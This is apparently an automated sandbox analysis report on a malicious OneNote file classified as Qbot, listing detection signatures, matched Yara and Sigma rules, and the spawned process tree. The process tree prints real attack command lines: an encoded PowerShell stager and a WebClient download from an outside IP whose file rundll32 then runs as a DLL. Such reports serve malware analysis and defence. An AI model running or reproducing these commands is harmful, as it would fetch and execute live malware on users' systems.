Edit tour
Windows
Analysis Report
Funds_160151.one
Overview
General Information
Detection
Qbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Qbot
DLL reload attack detected
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Allocates memory in foreign processes
Powershell drops PE file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
PE file overlay found
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64native
- ONENOTE.EXE (PID: 6420 cmdline:
C:\Program Files\Mic rosoft Off ice\Root\O ffice16\ON ENOTE.EXE" "C:\Users \user\Desk top\Funds_ 160151.one MD5: 59056F600C4366EE07277C20A90DAF67) - ONENOTEM.EXE (PID: 5280 cmdline:
/tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
- cmd.exe (PID: 376 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\Open .cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 7132 cmdline:
powershell .exe $atKU f9 = '6288 9e73828c75 6c961c5a6d 6c01a463'; [System.T ext.Encodi ng]::ASCII .GetString ([System.C onvert]::F romBase64S tring('DQp AZWNobyBvZ mYNCnNldCB hMXlKRFJMU T1heHZnc0s NCnNldCBhT FF1Q1J5NT1 hSG5CZFVNM g0Kc2V0IGF GZGl6SWtEd D1hYlBTNXE NCnBvd2Vyc 2hlbGwgKG5 ldy1vYmplY 3Qgc3lzdGV tLm5ldC53Z WJjbGllbnQ pLmRvd25sb 2FkZmlsZSg naHR0cDovL zg3LjIzNi4 xNDYuMzEvM zgxOTkuZGF 0JywgJ0M6X HByb2dyYW1 kYXRhXGdiL mpwZycpOw0 Kc2V0IGFnT WFlM3BDPWF 5YXUzDQpzZ XQgYW1QdFV NY0E9YVJaa mUNCmNhbGw gcnUlMWxsM zIgQzpccHJ vZ3JhbWRhd GFcZ2IuanB nLFdpbmQNC mV4aXQNCg= =')) MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 1868 cmdline:
C:\Windows \system32\ cmd.exe /K C:\Users\ Public\1.c md nd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - powershell.exe (PID: 7252 cmdline:
powershell (new-obje ct system. net.webcli ent).downl oadfile('h ttp://87.2 36.146.31/ 38199.dat' , 'C:\prog ramdata\gb .jpg'); MD5: 04029E121A0CFA5991749937DD22A1D9) - rundll32.exe (PID: 4180 cmdline:
rundll32 C :\programd ata\gb.jpg ,Wind MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 4260 cmdline:
rundll32 C :\programd ata\gb.jpg ,Wind MD5: 889B99C52A60DD49227C5E485A016679) - backgroundTaskHost.exe (PID: 3124 cmdline:
C:\Windows \SysWOW64\ background TaskHost.e xe MD5: F290D12F0351B56708B3DF1EC26CB45B)
- ONENOTEM.EXE (PID: 7188 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\root\ Office16\O NENOTEM.EX E" /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) |
| |
Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | ||
JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 15_2_1000C547 |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |